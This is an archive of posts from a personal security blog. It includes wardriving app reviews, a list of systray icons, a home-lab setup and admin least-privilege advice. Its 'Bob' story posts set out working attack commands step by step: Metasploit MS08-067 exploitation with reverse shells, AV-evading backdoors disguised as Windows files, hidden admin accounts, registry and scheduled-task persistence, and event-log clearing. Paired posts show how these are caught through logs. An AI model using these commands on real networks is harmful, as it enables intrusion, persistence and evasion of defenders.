Syn

Know Your Enemy

2010-05-14T13:42:00.003+01:00

I haven't posted for a bit because to be honest I haven't had much to say about security that might be interesting. I have been active on my Cisco Basics blog though for anyone interested in that type of thing.

I'll get to the point of this post though, recently I was emailed by a guy called Matt. In his email Matt suggested maybe we bounce a few ideas off each other for future blog stuff. To me this sounded great as I needed something to motivate me to get posting again but as most security people know, we can be a pretty suspicious and paranoid bunch. So I did a little digging on Matt, nothing too much just the run of the mill Google Fu and a little Maltego. Once I'd satisfied myself that Matt was probably Matt I emailed back and we began to chat. As it turned out Matt really knows his stuff and his site AttackVector is superb.

The night before last I was reading Matt's article on Invasion of Privacy and the reason I'm bringing to your attention is because it is hands down the best example of personal information gathering that I have read. Matt's subject was a spammer (what goes around comes around) but the same techniques that he describes can be employed against any target. He uses DNS, Whois, Facebook, LinkedIn, Goggle and other easily accessible services to research his target and gather data that most people probably don't even realise is out there. I strongly recommend that readers head over to Matt's site and check out his article called Invasion of Privacy to see how it's really done.

Truly scarey stuff!!!

WiFi Analyzer - Another Great App For The Wifi Toolbox

2010-03-03T19:55:00.009Z

Every now and then I come across a iPhone app that has some of the features that my ultimate wardriving app would have. Wifi analyzer is no different, it hasn't got all of my wishlist features but it certainly has a few.

The features I'm talking about are useful from a wardriving perspective but even more useful for siting my Access Point or when trying to find to get the best signal. Another use would be when tracking down that rogue access point that I might have detected.

When firing up WiFi Analyzer I'm presented with a list of Access Points, the signal strength and the encryption in use. This is all pretty standard stuff that all my other WiFi apps do.

I can drill down into the individual Access Points but what I really like is being able to select an Access Point and home in on it by signal strength.

Here I can easily see when I am getting the best signal as I move around. This also makes pinpointing those rogue Access Points a piece of cake.

Another feature I really like with Wifi Analyzer is the graph feature.

Here I can see overlapping networks and I'll be able to make educated decisions on the selection of the channel to use for my AP to prevent interference from neighbors AP's. Alternatively I could use WiFi Analyzers recommendations.

All in all a pretty handy tool to add to your iPhone toolbox in my opinion.

UPDATE: Apple have removed this and the other wardriving apps from the app store. The bunch of dicks!!!!!

Oh well, jailbreaking looks all the more tempting now.

Systray Recognition System

2010-02-01T22:34:00.021Z

Impressive title eh. Well okay I'll admit it, the system is effectively this blog post and your ability to inconspicuously squint as you take in all the systray icons on other peoples computers.

What's the Systray?
The Systray is the area on the windows taskbar near the clock, properly referred to as the Notification Area I think. Often installed programs will display a small icon here indicating that they are running and the icon may change depending on the state of the program. It's important that attention is paid to the subtle differences in the icons, for example, a slight colour change may indicate that a program is running or not running.

Why blog about this?
Well I'm always checking out other peoples systray icons and wondering what programs they represent. After not having much luck with finding a good list on the web to refer to I thought I would create one. I have set myself a goal of seeing how many icons I can get in the list within the month of February. I'll continue to add new ones after that but this will be my focus in February because I'm going to be quite busy at work and I'm studying for an exam at the end of the month.

Why is the relevance to security?
Recognising systray icons will not only tell you about the software installed and the state of that software (running, not running, enabled, disabled, version etc...) but will also tell you about the person using the computer (Geek, salesman, lazy, Hax0r etc...) and we all know that smart hackers hack people not just computers. Systray icons will also tell you if that person is connected back to the office, if they are running encryption software etc... These are all the things that i'm interested in and I imagine some people reading my blog are interested in as well. If you need any further convincing I suggest you watch Johnny Longs excellent "No Tech Hacking" presentation.

Any comments, suggestions, corrections or submissions will be greatly appreciated. So lets bring on the icons!

Remote Management

VNC server -Not connected

VNC Server - Connected

Remotely Anywhere

Logmein

Anti-Virus / Security

Avira - running

Avira - Not Running

McAffee

McAfee On Access Scanner

Norton

Sophos - Running

Sophos - Out of date

Sophos - Disabled

AVG - old version

AVG - V 8.5

AVG - V 8.5 - Outdated / Connection failed

AVG - Running

AVG - Paused

Kaspersky

Avast

ZoneAlarm – No Traffic

ZoneAlarm – Internet Locked

ZoneAlarm - Running

Microsoft Defender - Active

Microsoft Defender - Running

PCTools Threatfire - Enabled

PCTools Threatfire - Disabled

Tiny Personal Firewall v 2.0.15

Communication

Bluetooth - Disabled

Bluetooth - Enabled

Cisco VPN - Not connected

Cisco VPN - Connected

Wifi - Connected

Wifi - Not Connected

LAN - Connected

LAN - Disconnected

Cisco Network Magic - Running

Cisco Network Magic - Not Running

Encryption

WinPT

PGP

TrueCrypt

Sanctuary

Other

MS Security Center - Warning

MS Windows Updates - Warning

MS Office 2003

VMWare Tools installed

MS Outlook - New Mail

Synaptec Pointing Device

xampp

Night Watchman Power Management

Daemon Tools

Daemon Tools - Emulation Enabled

Daemon Tools - Emulation Disabled

Realtek HD audio Manager

Unlocker Assistant

SIW

Thanks to the following for submitting icons:

Jimmy
Dave
James
Charz
Mark

What Bob Did. What Alice Saw - Part 2

2010-01-29T22:31:00.008Z

This is the 2nd part of the story which is all about Bob the evil hacker and Alice the overworked Sys Admin.

In the previous post Bob was using some of his command line Kung Fu to carefully analyse the Walliford Active Directory before creating some very inconspicuous admin and user accounts. Bob being the careful kind of guy that he is also attempted to cover his tracks by deleting the logs on the victim server.

In this post I'll be looking at how Alice might have spotted all Bobs actions if she was following 2 best practices:

1) Analysing the logs.
2) Logging to another server.

Part 2 - What Alice Saw

Alice turns up at the office a few minutes early as usual. She likes to get in, grab her coffee and then start on her daily tasks. First she checks her emails for anything urgent, then the helpdesk, and finally she gets to her server logs. The information that windows logs can be pretty overwhelming, luckily Alice has a few filters that she can apply to look for key events.

What Alice ideally wants to know is what accounts have been added or deleted and what groups have been modified. She keeps a list of the events that she needs to watch out for to spot these types of activities. Other interesting events that Alice keeps a close eye on are those for people logging into servers, bad passwords and account lockouts.

Her daily log analysis isn't her favorite job, but it's an important one. She would love to get her boss to pay for a tool to do the log correlation but unfortunately he doesn't see it as an important enough task. As soon as Alice finds the time and starts looking through the logs she starts to worry. She see's a whole bunch of login failures from earlier that morning.

On closer inspection Alice sees some very strange looking account names like metasploit.

After those entries Alice sees an event 624 Which indicates a new account has been created for a user called Bob Ball.

Alice checks the helpdesk to see if a call was raised for a new employee called Bobby Ball, it wasn't.

Next Alice can see an event 632 that shows that the new account has been added to the HR group.

She makes a quick call to HR and finds that they know nothing of this mysterious account. Alice disables the account until she can get to the bottom of what's going on.

Just as Alice finds a few minutes to spare she goes back to her logs and then her phone rings. As she's summoned to a project meeting she thinks that the logs will have to wait. Unfortunately the meeting takes up the rest of her day.

The next day Alice gets to the office extra early so she can catch up with her tasks. However, on connecting to her server she finds the logs are almost completely empty. All the entries from the previous day had been cleared. The oldest event is a event 517 which shows that the logs have been cleared.

As Alice sits back and thinks about things she convinced that some evil hacker has tried to break into her network, she counts her lucky stars that she spotted the hackers account and disabled it quickly before any damage was done.

The End

Okay, I know my story is pretty crap but I bring all this log stuff up because had recently had a conversation with someone who didn't realise just how much useful information was contained in the Windows security event logs. This post is just really to highlight 2 things. Get your logs off the server, there are plenty of great tools to do that, unfortunately they all cot a bit. Secondly, build time into your day to analyse the logs. Find out the important events and find a way to filter the logs to spot when something is wrong.

If you want to learn more about the Windows Event Logs check out Randy Franklin Smiths site Ulitimate Windows Security. His site is without doubt the best resource for learning about the windows security logs I have ever found, and his webcasts are pretty amazing.

What Bob Did. What Alice Saw - Part 1

2010-01-19T23:21:00.012Z

Recently I've been have way to much fun looking at event logs and digging out which events are indicators of a compromise. As is typical for me I'll try to wrap some of that knowledge up into a little Bob story. So here goes.

Part 1 - What Bob did.

Bob has been up to his old tricks again and has found himself on the wrong side of someones firewall. Well maybe not the wrong side as far as Bob is concerned but it certainly is for Alice, our Systems Administrator. Bob being Bob decides to start his day with a little pwnage, he hunts around for a target and after a little scanning decides to go with a wide open domain controller which he likes to call 10.0.1.233, or as Alice would call it, Server04.

Bob, sporting his brand new installation of BackTrack4 , decides to test drive the fantastic Fast-Track scripts. He uses Fast-Track not because he's lazy or can't be bothered to learn Metasploit, but because he only has a few minutes before work and he needs to get his pwnage on pretty sharpish.

After successfully getting his Meterpreter session Bob uses the shell command to drop down to a Command prompt. Once at the prompt he decides to list the users on the domain.

net user /domain

The resulting list is quite long and split into 3 columns, as Bob intends to extract the user list to use in future scripts he decides to make use of the DSQUERY command to give him the list in a nice single line list.

dsquery * -filter "(&(objectcategory=person)(objectclass=user)(name=*))" -limit 0 -attr samaccountname

With that done Bob decides to go ahead and quickly create a couple of accounts. He wants to create 2 accounts, one as a user because after all thats where the data is right. The other account will be an administrative user because that will help him get to other interesting places on the network. Another good reason for having 2 accounts is if Wallifords discover his intrusion they'll likely try to identify the intruders user account and may well stop when they find the first one. Cunning eh!

Now in the past Bob has used "Net User username password /add" to do this, but that will create an account that even the crappiest of admins will spot. What Bob needs to do is create an account that blends in with the rest of the user accounts, to do this he takes a look at a few user accounts that already exist to see what account properties are populated as standard.

dsquery * -filter "(&(objectcategory=person)(objectclass=user)(samaccountname=jimm))" -limit 0 -attr *

From here Bob can see that the user Jim Morrison has a Title, Office, Display Name, telephone Number and Home Drive fields neatly populated as do many of the other users. Armed with that knowledge Bob creates an account with DSADD that will sit nicely with the other accounts in the same Organisational Unit.

dsadd user "CN=Bob Ball,OU=Internal,DC=walliford,DC=local" -Samid BobB -Pwd Eviluser123 -fn Bob -Ln Ball -Display "Bob Ball" -Office Leeds -Tel "01233 455779" -Dept HR -hmdir \\wal-filer\users\BobB -Title Manager -upn BobB@walliford.local

Bob checks his handy work before he moves onto his next task.

dsquery * -filter "(&(objectcategory=person)(objectclass=user)(samaccountname=BobB))" -limit 0 -attr *

Now Bob wants to give this user account access to some data, and that will be done by making Bob a member of some groups.

dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=*))" -limit 0 -attr Name

So there is the list of groups but lets take a closer look at the HR one first.

dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=HR))" -limit 0 -attr *

Okay that'll do. Bob just needs to modify the properties with DSMOD to add his user account as a member.

dsmod group "CN=HR,OU=Internal,DC=walliford,DC=local" -addmbr "CN=Bob Ball,OU=Internal,DC=walliford,DC=local"

With that sorted Bob wants to create his admin user. hmmm something that wont stand out again. He models the account of other built-in accounts and sets his password to never expire. Hopefully this won't raise any eyebrows.

dsadd user "CN=Cert Owner,CN=Users,DC=walliford,DC=local" -Samid CertOwner -Pwd EvilAdmin123 -Desc "Built-in account for administering certificates" -Display "Domain Certificate Owner" -pwdneverexpires yes

Brilliant. No need to go to town on the groups again. This time he's adding the account straight into Domain Admins.

net group "Domain Admins" CertOwner /add

With that done Bob decides he really needs to get off to work.

Whilst Bobs at work he's slightly troubled that he may have left traces in the logs on the server he compromised. As soon as he gets home he hops back onto the network and just for fun connect through RDP to the server to test his account.

Works like a charm. He has a quick look around and logs off the RDP session. Then Bob remembers what he was supposed to be doing. He gets a new Meterpreter session up and issues the command to clear the logs

clearev

All sorted. Now it's dinner time, pie and chips tonight.

Coming up...What Alice Saw.

A Little Forensics Goes a Long Way

2010-01-13T22:03:00.007Z

Today I had a friend complain that his user account was continually getting locked out. I asked the usual questions and he was sure that it was not him and his fat fingers. Straight away I put my Super Admin hat on try and find out whats going on. As a big fan of the event logs I decided to start there, and with this being an account lockout I went straight to the PDC Emulator as I knew there would be events for the account lockout in the security log.

Using Microsofts free EventCombNT I specified a date range and I configure it to extract just the account lockout events from the PDC Emulator.

After EventCombNT had finished I use the fantastic free Highlighter tool from Mandiant to find all occurrences of account lockouts for this users account.

After filtering by Keyword on my friends username I see all the occurances (in red) where his name is present in the logs. I select one of these events, highlight his name and select "Show Only" from the context menu.

This removes all other events and I'm left with just the events that relate to the lockout of my friends account. I glance down the list and quickly identify the computer which is responsible for the lockouts. Just as my friend decides to go down there and give the user a good talking to I tell him to give me a second. I quickly check the C:\Windows\Prefetch\ directory on the offending computer to see what programs were run at the time of the lockouts.

On seeing the applications listed that correspond with twe times of the lockout my friend goes very quiet. Then he tells me he remembers configuring software for this user. To get the software to work he had to use his own account, and.........well you guessed it, he has since changed his password.

What a nugget!!!

iPhone Wardriving Just Got Better

2010-01-10T13:04:00.010Z

Last week I was lucky enough to recieve a blog post comment making me aware of a new iPhone wardriving app. I did a bit of online research then went straight to the app store to download Wifi-Where to take a look for myself.

Wifi-Where was very reasonable priced at £1.79 and after using it once I can say that I really think it's worth the price, if not more. This is certainly the best app I have found for wardriving and here is why.

Wifi-Where has the following features in version 1.0:

Easy to use interface
Continuous scanning mode
GPS Logging (when device supports it)
Save hotspots for later
Email scan results
Email attachments (OS 3.0 Only) in Net Stumbler .ns1, CSV, or Google Earth KML formats
Option to ignore secure networks
Option to ignore hidden networks
Option to sort by signal strength
Option to automatically save new networks
Option to beep & vibrate on discovery of new network (when device supports it)
Option to filter hotspots by signal strength and location accuracy
Displays detailed information about each network, including name/SSID, signal strength, raw RSSI value, security & authentication modes (WEP/WPA/WPA2), location, MAC address
Connect to hotspots
Save passwords for secure networks
Upload hotspots to popular wardriving website wigle.net

With the UK being hit by quite bad snow at the moment it has made for excelent wardriving weather. I can pretty much drive anywhere nice and slow taking in all the access points and nobody bats an eyelid.

Now although Wifi-Where has all the features you'd expect in a decent wifi scanner, what really sets it aside as the tool to use for wardriving is the developers have really thought about a few things, such as AP's ( I use the terms AP and access point interchangeably throughout this post) are not discarded as they drop out of range as is the case in many other wifi scanning apps. AP's within range are shown in bold and open access points are shown with a different icon and colour than secured AP's.

Filters can be applied to ignore secure, ad-hoc or hidden AP's and the filters can be applied to show discovered access points depending on strength and location accuracy.

Other features that make this my wardriving app of choice is during a scan all areas of the screen are disabled except for a small stop button in the corner. This is great as the phone will keep scanning if I accidentally touch the screen. Even more useful I can put my phone in my pocket as I scan without worrying about knocking the screen.

The features are very well documented in the app itself and can be easily viewed by select the info icon in the top right on the screen.

Other features such as locking the UI and beep or vibrate on discovery are easily configurable.

The export capabilities in Wifi-Where are just as configurable with a selection of different attachment types available to include as email attachments so scans can be easily imported into either Netstumbler, Google Earth or directly to the popular wardriving site Wigle.net.

Following a scan and prior to an export Wifi-Where displays a useful summary from the captured data detailing the number of hotspots, those that were open, secure, hidden or ad-hoc.

Wifi-Where also exports out to a csv which is really useful for keeping logs of a particular scanning session.

I have only one criticism of Wifi-Where, after a scan if you apply a filter it seems to delete everything but what you are filtering on. I would like to see either a warning that data is being deleted or see the preferably see the filters applied and removed without actually removing data.

The following are features I would like to see in future updates:

A countdown timer applied to scans. This would be useful to prevent the battery completely depleting during a scan.

Having a swipe to delete function on individual access points would be nice.

Additional filters on encrypted AP's would be useful, such as listing all AP's using WEP. Combining filters such as WEP and no encryption would also be handy.

The only feature I have seen in another App which I would like to see here would be the radar view as implimented in WiFifoFum. Wifi-Where could improve on this by allowing filters to be applied and then switching to radar view to let the user home in on a particular AP. Along with this could be graphing screen that allows the user to select a range of AP's and see graphs of the signal strength as you move around. This would useful when siting access points.

It would be great to have the ability to run the app in a GPS only mode and log routes to a .kml file for later import into Google Earth. This would effectively double up the program as a GPS tracker and if this was done without the wifi card being enabled it would save valuable battery life. Then again this feature could be fleshed out enough to be an app in it's own right.

All in all my opinion is that Wifi-Where is the best iPhone wardriving app for non jailbroken iPhones. If you only want the one wifi scanning app on the iPhone I suggest Wifi-Where is the one to purchase.

Part-time Superman

2010-01-08T20:43:00.003Z

The other night I went out for a few pints with a mate who is a network manager at a prison. We were discussing a new application that he is rolling out to inmates and as I asked questions it came out that he, along with all the other network admins have domain admin privileges on their day to day user accounts and all IT Staff have local admin privileges. I was shocked that in a prison more emphasis wasn't placed on network security. My mate explained that although all the books he had read and all the courses he had attended had always recommended that you should only have the minimum privileges necessary to do your job, the reason for having these admin rights is it's impossible to work without them. I told him that I thought that was total bollocks and thanks to Conficker I had managed to push through policies at my workplace where no IT staff has Domain Admin rights on their day to day account and no user (including IT staff) has local admin rights. I spent the next half hour or so explaining that this wasn't about preventing the admins from having god like control over their computers, it's more about having the least privileges needed to perform a particular function.

Having a policy that puts IT administrators into the Local Administrator group puts every workstation at risk if the IT administrators PC is compromised or infected with malware. Having users with Domain Admin rights on their day to day accounts puts not only every workstation at risk but every server at risk as well. Hopefully by the end of my drunken rant he got the idea.

OK, so the way I have achieved this level of account control is by the use of SuperUser accounts. Each administrator has their normal day to day account which is as restricted as a normal user and they also have a SuperUser account. The SuperUser accounts have Local Admin and Domain Admin privileges, but they do not have mailboxes or Internet access. This forces the admins to use there day to day account to log in and work as normal. Admittedly this does mean there are more accounts to keep track of but I have a few PowerShell shell scripts that I regularly run to help with that.

When the admin needs to remote onto a server he uses his SuperUser account, which provides a useful audit trail which isn't achievable if all admins use the administrator account. When the admin needs to run tools from his PC I advise them to use the RunAs command. I have the following shortcuts set up on my computer which covers nearly everything I have to do.

Command Prompt
When I launch cmd.exe I'm prompted for my superuser password, then everything I run from the shell is within the context of my superuser account.

C:\WINDOWS\system32\runas.exe /user:DomainName\SuperUserAccount "C:\WINDOWS\system32\cmd.exe"

PowerShell
I have configured a PowerShell shortcut to run as my superuser account. I also have a standard PowerShell shortcut that I use where possible. The shortcut uses the following command:

C:\WINDOWS\system32\runas.exe /user:DomainName\SuperUserAccount "C:\WINDOWS\system32\windowspowershell\v1.0\powershell.exe"

Windows Explorer
The explorer shortcut is really handy if I need to browse the file systems of remote servers. The shortcut uses the following command:

C:\WINDOWS\system32\runas.exe /user:DomainName\SuperUserAccount "explorer /separate"

Custom MMC
I have created a custom MMC with add-ins that I require to perform admin tasks such as Active Directory User and Computers, Sites and Services, Computer Management and a few others. I have saved the MMC in a directory that's easy to launch from a command prompt that I'm running as my SuperUser account.

Any other program need to run under elevated permissions are either run using the RunAs command or i right clicked on and use RunAs from the context menu.

The PowerShell function I created script to regularly check that the SuperUser accounts group membership is quite simple and works well as all the superuser accounts are named similarly.

Function Check-SuperUsers {
Write-Host "SuperUser Group Membership" -ForegroundColor Yellow
$names = (Get-QADUser -sizelimit 0 -SamAccountName "*-superuser")
Foreach ($name in $names){
write-host $Name -ForegroundColor Red
$user = (get-qaduser $Name); $groups = $user.memberof
Foreach($group in $groups)
{$strGroup = $group.split(',')[0]
$strGroup = $strGroup.split('=')[1]
$strGroup
}
}
}

Finally, another effect of this reduction in privileges for admins and IT staff is we get affected by group policies and software issues in the same way that users do, although this may be viewed as inconvenient I think it makes us better at solving problems. In the same vein we as admins are (or should be) affected by the same security restrictions as typical users on our day to day accounts, if we can find loopholes or gaps in these restrictions to allow us to bypass them then so can the users. Far too often I make hear management make comments that users will not be able to bypass this or that restriction because they are to stupid. I often wonder who the stupid ones really are.

The SynJunkie Lab - Part 2

2009-12-27T23:51:00.004Z

This is just a very quick followup post to get a couple of diagrams posted following a few of requests after my last blog post.

I'll start off by saying that the network details I'm posting are for a test lab that I am currently preparing for some future blob posts. I'm not overly concerned about posting these details as they are for my lab which will be pretty much trashed when I've finished a few blog posts I have planned. The network is segmented off from my own network so anything I let loose on the Walliford LAN is not going to impact my wifes Facebook usage! (Got to get the priorities straight).

The image below shows the 2 laptops and a netbook I have and how I use them in respects to the lab.

I usaually just fire up a DC and whichever hosts are needed depending on what I'm testing. This just goes to show that if your not doing anything to heavy on the VM's you really can create a lab on a shoestring budget.

Below is the diagram of the Walliford LAN as it would look if it were a real network. Obviously there would be additional hosts and other network devices but what I have created is enough for me to test most of the functionality of my tools, and the range of host I have (Mail, SQL, Web etc...) is enough to keep me busy for a while yet.

This is the LAN which Bob will be playing with in the next series of Bob posts which I plan for the new year.

As you can see, I'm no diagramming expert but what I have is good enough to help me step through the network as i'm planning my posts. I'll probably tweak and adjust the diagrams as needed but for now they'll do.

Anyway, thats about it for this post. As I said it was just about getting the diagrams out.

Cheers

syn

The SynJunkie Lab - Part 1

2009-12-21T09:37:00.004Z

I've been asked a couple of times recently how I have my lab set up, in this post I'll provide a brief overview.

Just quickly I want to say that if you have the time and resources to create a lab I thoroughly recommend doing so. I use my lab for testing configurations that I wouldn't want to try on a production network, applying policies and testing the effects on servers and clients and learning new software. Primarily I like to use the my lab for learning and using security tools in an environment that will allow me to have a complete view of the effects of the tools from both an attackers and defenders perspective where they won't damage anyone's network.

Setting up a lab is a really useful learning exercise in itself. For example, I haven't had the opportunity to use virtualisation in the workplace yet but because of my lab I have experience using VMWare, Xen, Parallels and Virtualbox.

One tip I would give to anyone setting up a lab is this, approach the project as if you were designing a real network. Plan it, document it and maintain it. A few years ago I heard an interview with Mike Poor, one of the tips he gave was to know your network. In real life that might not be possible, you might be working the helpdesk or in IT Support and not have access to servers and switches, But in your lab you can be in control of every area of the network, the servers, the network, the clients. You really are God, so use those god-like powers to know your network inside out. Use the functionality offered in the virtualisation tools, if you are going to make a major change or you are going to perform a particular attack, back up the necessary hosts firsts or take snapshots so you can roll back, just like you would on a real network. There's nothing worse than having to rebuild servers of your network just because you didn't take 5 minutes to do a snapshot first.

Finally, give thought to segmentig your lab from the rest of your network, realising you have DOS'd you wife as you refine your ARP poisoning attack is not a good thing!

With that said, here's a few details of my lab. The physical hardware I have is as follows:

1 x Dell laptop
1 x MacBook
1 x Acer netbook
2 x wireless routers
1 x Cisco 2950 switch
1 x Cisco 800 series router

I use a combination of Parallels, Xen and Dynamips to virtualise about 5 servers, some workstations and as many routers as I need. The Dell laptop is a pretty beefy laptop that I used as my primary PC before I got the Mac. I wiped off the OS which was Vista and installed the free Xen Server hypervisor. This allows me to use all the memory for servers and PC's as the hypervisor runs on next to nothing. These are the primary servers and workstations that I attack in my lab.

On my mac I have another DC, a member server and a few VM clients. Having the DC allows me to perform some tests if I'm away from home and I don't have access to the xen server.

The Switches and routers are from a bin (yes people really do just throw out perfectly good hardware) and from ebay.

For OS's for the VM's I'll either use the 180 day eval versions or whatever else I can find, there are plenty of Linux distros about that can be downloaded. Or if you are limited on bandwidth Go down to the newsagents and grab a linux magazine, there are always Cover CD's which have distributions included.

Building a lab can be done for very little cost. With Virtualbox for virtualisation, eval versions of OS's available from Microsoft and more free Linux distros than you can shake a big stick at there's really no excuse. I guess the only outlay is going to be hardware and at the moment hardware is pretty cheap. One thing I do to make the most of my hardware is after building a host, I get it up and running and then look at the resources (memory and CPU) it's using. Then I tweak the resources available to the VM down as much as I possibly can. This allows me to get more VM's up and running on my Xen laptop at the same time. However, if the role of the VM changes make sure you review the resources so it has enough power to do it's new job. And once again, document the lab so if you don't get chance to use it for a while you can easily review your network diagrams and pick up where you left off. Kivio is a free network diagramming tool for the Linux platform. If your a Windows only type of guy then give www.gliffy.com a try, you need to register but after that you'll have access to pretty snazzy network planning tools.

I hope this has been useful to someone.

All the best

Syn

The Obligatory "I'm Not Dead" Post

2009-12-11T20:56:00.003Z

There comes a time in a bloggers life that he or she has to post the "I'm not dead" entry. I'm not sure why and I'm not sure if anyone cares but I guess it's just good manners. So here it is.

I'm not dead but I am currently updating my lab with a SAN/NAS, SQL server, routers & switches and an Exchange Server for yet more Bob fun, well fun for me anyway. I hope to have the lab ready to continue and some fresh ideas for the next round of Bob posts in the new year. I'll be picking up where I left off, with Bob having planted his backdoors and now preparing to make himself at home on the Walliford network.

All the best for the holiday season.

Syn

Bob The Backdoor Man - Part 2

2009-11-20T22:56:00.012Z

Previously in Bob Land....

The very next day Bob feels ready to hop back onto his compromised host on the Walliford Fries LAN and get his back doors planted. He logs into the wireless network with the WPA key he cracked earlier and he uses the gets a shell on the unpatched PC with the MS08-067 exploit.

use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.102
set LPORT 8181
set RHOST 192.168.2.101
exploit

Bob migrates to a stable process then uploads his backdoors to the Windows\System32 directory using Meterpreters upload function.

migrate 714
lcd /root/payloads
upload winmsd32.exe
upload winmsd16.exe

After Bob lauches a shell he creates a new user and adds it to the Administrators, Power Users and the Backup Operators groups

shell
net user MS_Support31337 Support31337 /add
net localgroup Administrators MS_Support31337 /add
net localgroup "Backup Operators" MS_Support31337 /add
net localgroup "Power Users" MS_Support31337 /add

He choose these privileged groups as a group policy may be configured to control the local Administrators group and by remaining in the other groups he will still have a high level of access.

Now Bob wants to get down to business and plant some of these lovely backdoors he's created. Bobs first port of call is to create a registry entry to run his meterpreter payload and connect back to Bob each time the computer is booted.

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft winmsd32" /d "C:\Windows\System32\winmsd32.exe"

Bob check that his registry entry has been set using the reg query command.

reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Then it occurs to Bob that someone may well stumble across his registry entry and remove it so he decides to have a backup by creating some scheduled tasks. One task (the meterpeter reverse connect) will run every 10 minutes and the other (the listening shell) will run at startup.

schtasks /create /tn "Winmsd32" /tr C:\Windows\System32\winmsd32.exe /sc minute /mo 10 /RU "NT AUTHORITY\SYSTEM"

schtasks /create /tn "Winmsd16" /tr C:\Windows\System32\winmsd16.exe /sc onstart /RU "NT AUTHORITY\SYSTEM"

Now the only way the normal logged in user would see these Scheduled Tasks is by looking at the directory using a command prompt. Only an Administrator running schtasks on the PC would see these scheduled tasks, anyone else will see nothing. Even looking at the C:\Windows\Tasks folder through explorer wouldn't show the tasks as it will only show the current users tasks.

Bobs pretty happy about this but what would make him happier would be if it was really really hard to see his backdoors. Then it occurs to him that by changing the attributes on the jobs in the tasks folder it would be really really hard as the user would have to do a "dir /a:h *.*" on the directory specifically. Okay, so thats not really really hard but it is a bit of a bugger!

cd \windows\tasks
Attrib +H winmsd*.job

Then Bob checks his handy work by looking at just hidden files.

Great, Bob fires up another instance of msfconsole and sets up his handler for the sessions that should start coming in.

use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.102
set LPORT 8080
set ExitOnSession false
set AutoRunScript winenum.rb
exploit -j -z

Within a minute or 2 Bob gets a session from his scheduled task backdoor.

What he really likes about these scheduled tasks is he wont get loads of sessions back from the same host, but if he looses connection he'll get another session back 10 minutes later. Also, every now and then Bob can change the AutoRunScript so Metasploit can gather all sorts of useful information on his behalf.

Now Bob is in, he has his backdoors sorted and he wants to have a look around to see what else might be interesting. Bob has a knows a guy who works for Wallifords. Now this guys is a bit of a dick and is always boasting about how much he earns. Bobs sure the guy exaggerates, wouldn't it be nice if Bob could access the payroll data and see if this guy is telling the truth?

Oh, look at that, lunch time. Bob goes and gets his dinner and has a think about what other interesting things he might be able to find on the Walliford network.

Coming next.......Bob gets to know his new friends!

Bob The Backdoor Man - Part 1

2009-11-17T22:10:00.015Z

Previously in Bob Land......

Bob hears on the grapevine that ncat won't work as a single executable. This is a bit of a bugger and it does give Bob a problem. His intention was to use ncat for file transfers, proxies and backdoors. It was also pretty useful that it was pretty much undetected by AV.

Luckily for Bob he hears from a good friend that it's quite possible to modify netcat to be able to bypass anti-virus software. And luckily for Bob, the most talented Muts has created a video that shows him exactly how to do that here.

This problem also presents Bob with the perfect opportunity to get his hands dirty with some msfpayload love. He reckons that if he creates a couple of payloads to add into his cab file he should be able to do everything he needs. And the beauty of using msfpayload is he'll be able to run them through msfencode to bypass most anti-virus.

Before Bob creates his payloads he grabs a copy of winmsd.exe from his Windows OS. It doesn't really matter to him what file it is he just wants one that is a Microsoft file. He want this because all his payloads can take on the characteristics of the file. Rather than going to great lengths to hide a file, Bobs opinion is that hiding in plain site will probably be better.

Payload 1
For Bobs first payload he wants to create a generic payload that will spawn a command shell when he connects to it on port 6666.

./msfpayload windows/shell_bind_tcp LPORT=6666 R | ./msfencode -t exe -x /root/payloads/winmsd.exe -o /root/payloads/winmsd16.exe

Bob has specified a payload that will bind a shell to port 6666. He outputs this in raw format to the msfencode program that will help avoid detection by anti-virus software. Finally he has specified that the file is called winmsd16.exe and upon physical inspection it will look just like the original winmsd.exe file.

After Bob creates the file he tests it out on his XP VM to make sure it works as expected.

Side by side it looks just like the original file, it is identical in size and looks just as through its a legitimate file from Microsoft.

Bob runs the file and checks he can connect to it with netcat.

nc 10.0.1.10 6666

Payload 2
Bobs second payload will connect back to him when he's on the wireless network and present him with a meterpreter shell.

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.102 LPORT=8080 R | ./msfencode -t exe -x /root/payloads/winmsd.exe -o /root/payloads/winmsd32.exe

Again Bob uses a legitimate file to copy the characteristics from. This time on his host he has to make sure he has his listener ready on port 8080.

Bob decides that when he creates his listener he'll use msfconsole and pass the following commands:

use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
set LPORT 8080
set ExitOnSession false
set AutoRunScript winenum.rb
exploit -j -z

Bob has configured his listener to accept multiple sessions coming back to him, and the very useful winenum script developed by Carlos "Dark operator" Perez will run against each connecting host. All the information from the script will be stored in ~/.msf/logs/ Bob may well decide to change this at a later date to another script but for now he's very happy.

With his modified netcat and his payloads created and tested Bob rebuilds his cab file and goes to get his dinner. He knows that during his network exploration adventures he may well come up against some problems that will cause him to create some payloads on the fly but he'll deal with that when it happens.

Whilst eating his dinner Bob begins to worry that if the Admins at Walliford Fries patch the computers he may well lose his way in. By the time Bob has eaten his ice cream desert he has come up with a few ideas how he might overcome this particular problem.

Coming next....Backdoor Man - Part 2.

Bob Prepares For Action

2009-11-03T22:29:00.014Z

Previously in Bob land.......

Bobs back and he's been thinking about his new playground. He's realised that if he's not careful he'll attract attention and get into trouble, so he needs to lay down some ground-rules and define some goals before he goes back on the Wallifords network. If he's going to get the maximum benefit from Wallifords as a training ground rather than a playground he needs to get serious and stop recklessly throwing exploits at any old box.

Goal 1
To extract as much information about the Walliford Network as possible.

Goal 2
To identify high value targets and gain access to those systems.

Goal 3
To remain undetected.

Goal 4
To generally have fun, learn his tools and practice his techniques.

Pretty simple goals eh. Bob knows that to remain undetected he's going to have to use as many tools that are already on the compromised host as he can. He knows that he needs to use as many legitimate tools as possible and only upload those that won't be detected by AV.

